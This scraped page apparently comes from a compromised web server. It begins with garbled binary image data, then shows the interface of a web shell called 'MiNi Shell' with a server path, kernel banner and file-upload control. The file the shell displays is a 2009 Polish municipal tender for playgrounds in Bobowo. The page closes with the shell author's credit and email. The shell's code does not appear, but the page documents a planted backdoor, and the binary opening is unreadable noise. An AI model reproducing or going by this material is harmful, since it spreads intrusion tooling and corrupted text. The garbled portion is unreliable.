JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090928/164921-N-2009.html

<p class="kh_header"><b>Bobowo: ZAGOSPODAROWANIE  MIEJSC  REKREACJI  W  MIEJSCOWOŚCIACH     
   BOBOWO, GRABOWO, WYSOKA  I  JABŁÓWKO</b><br>
<b>Numer ogłoszenia: 164921 - 2009; data zamieszczenia: 28.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bobowo , ul. Gdańska 12, 83-212 Bobowo, woj. pomorskie, tel. 058 5621766 w. 42.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bobowo.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAGOSPODAROWANIE  MIEJSC  REKREACJI  W  MIEJSCOWOŚCIACH     
   BOBOWO, GRABOWO, WYSOKA  I  JABŁÓWKO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia są roboty budowlane wraz z dostawami wyposażenia placów zabaw obejmujące budowę placów zabaw oraz dostawę wyposażenia tych placów zabaw w miejscowościach: Bobowo, Grabowo, Wysoka i Jabłówko. 
Zamówienie obejmuje między innymi:
      a)  dowiezienie gruntu i jego rozplantowanie
b)  mechaniczne plantowanie terenu spycharkami
c)   profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne
d)   ogrodzenie z prefabrykowanych elementów żelbetowych i siatką 
e)	wykonanie nawierzchni trawiastej siewem 
f)	dostawa i montaż urządzeń rekreacyjnych (altany rekreacyjne, karuzele, huśtawki, zestaw zabawowy z metalową zjeżdżalnią, piaskownice, ławki

Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej, obmiarze robót budowlanych i Specyfikacji Technicznej Wykonania i Odbioru Robót 
 
Wykonawca zobowiązany jest do skalkulowania ceny za przedmiot zamówienia z należytą starannością w oparciu o w/w dokumentację stanowiącą materiał pomocniczy przy kalkulowaniu ceny.

Kosztorys ofertowy musi zawierać pozycje katalogowe (zbieżne z nazwami i kolejnością przedstawioną w obmiarze robót), jednostki obmiarowe, wartości jednostkowe, wartość łączną oraz tabelę elementów scalonych..

Wszystkie materiały i urządzenia niezbędne do wykonania zadania dostarcza Wykonawca. Materiały i urządzenia użyte do wykonania przedmiotu zamówienia muszą posiadać cechy techniczne i jakościowe, co najmniej takie, jakie zostały określone w dokumentacji projektowej i STWiOR oraz muszą posiadać stosowne atesty i certyfikaty. W przypadku użycia w dokumentacji projektowej oraz w STWiOR nazw własnych lub typów materiałów Zamawiający dopuszcza zastosowanie materiałów (równoważnych), co do wymagań jakościowych czy parametrów technicznych.

Wykonawca zobowiązany jest udzielić gwarancji na swoje roboty na okres 3 lat od dnia odbioru inwestycji przez Zamawiającego, a także na zamontowane urządzenia zgodnie z gwarancją udzieloną przez producenta.
  
Wskazane jest, aby przed złożeniem oferty Wykonawca przeprowadził wizję lokalną terenu budowy, sąsiadującej zabudowy oraz najbliższego otoczenia budowy. Termin wizji lokalnej i szczegóły techniczne jej przeprowadzenia wymagają uzgodnienia z Zamawiającym. Koszty dokonania wizji lokalnej terenu budowy poniesie Wykonawca. Dokonanie wizji lokalnej nie jest warunkiem koniecznym dla złożenia oferty w niniejszym postanowieniu.

Pieczę nad realizacją zamówienia sprawuje powołany przez Zamawiającego Inspektor Nadzoru, który ocenia zgodność realizacji inwestycji z projektem, kontroluje jakość i ilość wykonanych robót. 

Przedmiotowe zadanie jest dofinansowane w ramach działania (Odnowa i rozwój wsi) objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013. Umowa o przyznanie pomocy Nr 00105-6922-UM1100017/09 z 19 sierpnia 2009r..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 45.00.00.00-8, 45.11.20.00-5, 45.11.27.00-2, 45.11.27.20-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 3 500, 00 zł ,( słownie: trzy tysiące pięćset złotych ), które należy wnieść przed upływem terminu składania ofert.   	
1. Wadium może być wniesione w:
-      pieniądzu,
-      poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-  
        kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
-      gwarancjach bankowych,
-      gwarancjach ubezpieczeniowych,
-      poręczeniach udzielanych przez podmioty , o których mowa w art 6b ust. 5 pkt 2   
        ustawy z  dnia  9  listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju 
        Przedsiębiorczości (Dz. U.z 2007 r. Nr 42, poz. 275, z późn. zm.).
W przypadku wniesienia wadium w pieniądzu należy je wpłacić przelewem na konto (rachunek) Urzędu Gminy w Bobowie (Bank Spółdzielczy w Starogardzie Gdańskim nr rachunku 38 8340 0001 0000 1401 2000 0008)
Za termin wniesienia wadium w formie pieniężnej zostanie uznany termin uznania rachunku Urzędu Gminy w Bobowie (według potwierdzenia wpływu środków na rachunek określony w ust.1).

2. Wadium wnoszone w formie poręczenia bankowego, poręczeniach spółdzielczej kasy    oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć w Urzędzie Gminy do dnia i godziny oznaczonych jako ostateczny termin składania ofert. Powyższa gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych

3.  Zamawiający zatrzymuje wadium wraz z odsetkami:
    1) jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3u.p.z.p.   
        nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust.1 u.p.z.p., lub      pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie,

    2)  jeżeli Wykonawca, którego oferta została wybrana: 
         -    odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
               określonych w  ofercie,
         -     nie wniósł wymaganego zabezpieczenia należytego wykonania umowy na zasadach 
               określonych w specyfikacji istotnych warunków zamówienia publicznego,
         -     zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 

4. Wadium wraz z odsetkami wniesione w pieniądzu przez wykonawcę, którego oferta została uznana za najkorzystniejszą, za zgodą Wykonawcy zaliczone jest przez Zamawiającego na poczet zabezpieczenia należytego wykonania umowy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie   
    warunków:                                                                                                                                                                                                                                                                                                                                                                                                                                                 1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, 
      jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;  1.2 Posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem 
      technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią 
      pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i 
      osób zdolnych do wykonania zamówienia. 1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
      zamówienia; 1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia..
 3. Ocena spełnienia warunków udziału w postępowaniu wskazanych w pkt VII  nastąpi na podstawie złożonych przez wykonawców dokumentów:

3.1) W celu potwierdzenia, że Wykonawca spełnia warunek określony w pkt. 1.1,   
        zobowiązany jest złożyć:
-  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
    ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
    rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie  
    wcześniej niż 6 m - cy przed upływem terminu składania ofert.
-  Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające,  
    że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał 
    przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności   
    lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie 
    wcześniej niż 3 miesiące przed upływem terminu składania ofert,
-  Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy  
    Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z 
    opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub 
    zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na 
    raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu 
    wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

3.2 W celu potwierdzenia, że Wykonawca spełnia warunek określony w pkt. 1.2, 
       zobowiązany jest złożyć: 
-   wykaz wykonanych i zakończonych w okresie ostatnich pięciu lat robót budowlanych,    
     a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, polegających na 
     wykonaniu min.2 podobnych obiektów z podaniem wartości oraz daty i miejsca  
     wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały 
     wykonane należycie (referencje). Wykaz należy sporządzić zgodnie ze wzorem   
     stanowiącym załącznik nr 4 do SIWZ. 
-   aktualny dokument (kopię uprawnień) stwierdzający, że osoba, która będzie pełniła 
     obowiązki kierownika budowy jest uprawniona do kierowania robotami 
     budowlanymi wraz z aktualnym zaświadczeniem o przynależności do właściwej izby   
     samorządu zawodowego.

3.3 W celu potwierdzenia, że Wykonawca spełnia warunek określony w pkt. 1.3   
       zobowiązany jest złożyć:
       -  polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest 
       ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
       gospodarczej

3.4 W celu potwierdzenia, że Wykonawca spełnia warunek określony w pkt. 1.4, 
      zobowiązany jest złożyć: oświadczenie o spełnianiu warunków udziału w postępowaniu    
      zgodnie z art. 22 ust 1  pkt 1-3 i oświadczenie o braku podstaw do wykluczenia na  
      podstawie art. 22 ust 1 pkt 4, w związku z art. 24 ust. 1 i 2 ustawy Prawo Zamówień 
     Publicznych

4. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na 
     podstawie złożonej oferty wg formuły (spełnia - nie spełnia). Nie spełnienie chociażby 
     jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania.
5.  Zamawiający zawiadamia równocześnie wykonawców, którzy zostali wykluczeni z 
     postępowania o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne.
6.  Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
7.  Zamawiający odrzuca ofertę, jeżeli wystąpi przynajmniej jedna przesłanka 
     unormowana w art. 89 ust. 1 Prawa zamówienia publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1	Zgodny w treści wypełniony i podpisany druk pn. (Oferta) - załącznik nr 1 do  SIWZ.
2.   Podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu    
      zgodnie z art. 22 ust 1  pkt 1-3 ( załącznik nr 2 do SIWZ)  i oświadczenie o braku podstaw 
      do wykluczenia na   podstawie art. 22 ust 1 pkt 4, w związku z art. 24 ust. 1 i 2 ustawy   
      Prawo  Zamówień Publicznych (załącznik nr 3 do SIWZ)
2	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
4.  Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające,  
     że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał 
     przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności   
     lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie 
     wcześniej niż 3 miesiące przed upływem terminu składania ofert,
5.  Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy  
     Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z 
     opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub 
     zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na 
     raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu 
     wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6.  Aktualny dokument (kopię uprawnień) stwierdzający, że osoba, która będzie pełniła 
     obowiązki kierownika budowy jest uprawniona do kierowania robotami budowlanymi   
     wraz z aktualnym zaświadczeniem o przynależności do właściwej izby samorządu 
     zawodowego.
7.	Dane dotyczące podwykonawców zgodnie z wytycznymi pkt. XXV SIWZ  - jeżeli dotyczy - załącznik nr 5 do SIWZ.
8.	Wykaz wykonanych robót sporządzony według wzoru stanowiącego załącznik nr 4 do SIWZ oraz dokumenty potwierdzające, że roboty te zostały wykonane  należycie.

Zaleca się, aby przedkładane dokumenty potwierdzające, że wykonane przez       Wykonawców roboty budowlane zostały wykonane należycie, zawierały, co najmniej: 
a) wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu 
    realizował  roboty których dokumenty dotyczą,
      b) wskazanie podmiotu, na rzecz którego realizowane były roboty,
      c) wskazanie zakresu robót,
      d) wskazanie wartości robót,
      e)  wskazanie daty wykonania (rozpoczęcia i zakończenia),
      f)  wskazanie miejsca wykonania, 
      g) opinię podmiotu wskazanego powyżej w pkt. b stwierdzającą, że roboty zostały  
          wykonane należycie
9.	polisę lub inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
10.	Kosztorys ofertowy sporządzony zgodnie z wytycznymi zawartymi w pkt.  III SIWZ
11.	W przypadku składania oferty przez podmioty występujące wspólnie, wymagane w niniejszym postępowaniu dokumenty i oświadczenia (za wyjątkiem 1, 6, 10) muszą być złożone przez każdy podmiot.
12.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych warunków. Ponadto Wykonawcy Ci zgodnie z art. 23 ustawy Pzp winni ustanowić Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
13.	Pełnomocnictwo musi być dołączone do oferty. Zamawiający dopuszcza złożenie przedmiotowego dokumentu w formie oryginału lub kserokopii poświadczonej ( za zgodność z oryginałem) przez notariusza.
Wszelka korespondencja prowadzona będzie wyłącznie z Li.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bobowo.gmina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można również uzyskać nieodpłatnie w Urzędzie Gminy Bobowo ul. Gdańska 12, 83-212 Bobowo, pokój nr 10.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2009 godzina 11:00, miejsce: Urząd Gminy Bobowo ul. Gdańska 12, 83-212 Bobowo, pokój nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com